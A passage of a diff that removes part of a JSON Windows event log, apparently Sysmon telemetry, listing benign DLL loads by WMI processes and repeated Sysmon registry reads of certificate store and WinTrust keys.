"ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "esscli.dll", - "image_path": "C:\\Windows\\System32\\wbem\\esscli.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmiclnt.dll", - "image_path": "C:\\Windows\\System32\\wmiclnt.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "tapiperf.dll", - "image_path": "C:\\Windows\\System32\\tapiperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfctrs.dll", - "image_path": "C:\\Windows\\System32\\perfctrs.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "tquery.dll", - "image_path": "C:\\Windows\\System32\\tquery.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - 